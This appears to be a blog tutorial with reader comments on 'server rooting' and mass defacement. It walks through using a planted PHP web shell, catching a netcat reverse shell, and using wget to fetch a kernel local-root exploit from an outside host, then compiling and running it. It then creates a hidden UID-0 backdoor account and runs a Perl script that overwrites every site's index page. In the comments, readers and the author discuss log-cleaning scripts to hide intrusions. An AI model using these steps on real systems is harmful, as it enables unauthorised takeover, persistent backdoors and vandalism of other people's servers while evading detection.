Hi this is AV
in this tut you will learn server rooting+Adding New Root User+Mass deface
This is an detail tut with HQ images
So let's start with things you will need
- 1) Shelled website
- 2) Local root exploit
- 3) NetCat
- 4) Mass Perl script
Open up your .php shell on a hacked webserver.
I have mine for an example
Now you need to check what kernel your slave is using...
It should be something like
Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686
Next thing you wanna do is to look for an local root exploit.
From example provided mine one is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.
Here's the list of exploits
http://pastebin.com/A0sUhhrz
NOTE: If your webserver have 2.6.18 2011 kernel,then you have 0.0001% chances that you will root it,because there's no public exploit for that version.
Chapter 2 - Backconnecting to the server
For this you will need:
1) NetCat
2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)
So open your netcat and type:
-l -n -v -p 443
Hit "Enter"
Now it should write "listening on [any] 443 ..."
Good.
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".
Now it should connect to your netcat
I got something like this
Chapter 3 - Downloading exploit and executing it
Now we will need our exploit from Chapter 1
There's 2 way of uploading:
1) Using shell uploader
2) Using 'wget' function (Requires backconnection)
I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:
Now it downloaded out exploit named "2.6.18-164.zip" on our server.
If your exploit is downloaded as anyrandomname.c you must compile it
Do do that first download that exploit and then type:
gcc anyrandomname.c -o anyrandomname
And our exploit is compiled. (If you get errors when compiling then find another exploit)
If you downloaded your exploit in zip file anyrandomname.zip type:
unzip anyrandomname.zip
Now you should have your exploit (Like mine "2.6.18-164")
If you completed all steps it's time to get root.
Type:
chmod 777 yourexploit'sname
With common sense where i typed "yourexploit'sname" you will type your exploit's name.
And one last final step is to run our exploit
./yourexploit'sname
To check if you got root type
id
or
whoami
Mine steps to root
Chapter 4 - Adding root user
Adding new root user is fairly easy
We use this command:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2
Command explanations:
Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.
-u 0 -o - Set the value of user id to 0.
-g 0 - Set the initial group number or name to 0
-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel
-M - 'home directory' not created for the user.
root2 - User name of the new user account.NOTE: Change root2 to your desired username.
Now you need to set a password for your username.
Type in next:
passwd Root2
(Root2 is your username)
See an example
[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
To check if you did alright
id root2
(Root2 is your username)
GNY shell (fud) - http://www.privatepaste.com/074ebe43a4
Google - http://google.com
NetCat - http://downloadnetcat.com/nc11nt.zip
Mass defacing
Enter tmp folder after rooting
give the following command
cd /tmp
wget link of site where u uploaded
eg
wget www.abc.com/mass.zip
Then unzip mass.zip file give following command
unzip mass.zip
Then run the perl script by giving the following command
perl mass.pl
You see the above screen after running perl script
see its written how to use it
perl mass.pl /tmp/index.html
First upload your index page some were and get it by giving wget command
eg
wget www.abc.com/index.html
when you do that ull see the following screen
Now run the command
perl mass.pl /tmp/index.html
Too mass deface
Hope every one's doubt will now be cleared on how to root and mass deface a server
pls fell free to comment
I wish you could have explained the same with a video and an example site.
ReplyDeleteVery nice tutorial bro..! And it would be good if u add the techniques of clearing the sessions or ip address of the hacker from the server, in order to be hidden in the blackworld..! :P
ReplyDelete@Arjun Singh this are old screenshot as soon i come across ill sure post it
ReplyDelete@Srikanth Rao i use mig log cleaner to clear ip session & addeess ill soon post its script.. If u cn recommend any other thng ur welcomed
ReplyDeleteman r u on facebook
ReplyDeleteur profile?
@^^ a whole page is posted on that ;)
ReplyDeletehttp://avisuni.blogspot.com/p/join-me-on-facebook-twitter-google.html
Nice tut bro , very clear ! :)
ReplyDelete@tech Mafia Thnks
ReplyDeleteHi, thanks for this nice post. I am trying but i face some problem. You write that,
ReplyDelete"So open your netcat and type:
-l -n -v -p 443
Hit "Enter" "
When i hit enter my netcat says that "listening on [any] 443 ..." . but after that, nothing happen! I wait and wait... after 1-2 hours it still says "listening on [any] 443 ..." :( how can i solv this?? Please reply. :)
Try to connect with bindshell instead of back connect and try
DeleteIts coz u myt b using some proxy... do not use proxy..it will get connected..once u r done rooting.. run cleaners to clean ur logs
Deletebro how to delete log u should explain it too...
ReplyDeleteu jus have to run the script nthng else u have to do to delete logs..
Deletemany log eraser script are available on net use them
bro most of photo were gone , if u still have that old post back up , plz fill with photo ... I am a newbie in hacking so i need that techinique
ReplyDeletethanks u very much for ur sharing
Be cool along in ur life , i pray for u
Soory i dont have the backup ill try to update if i come across some new server
Delete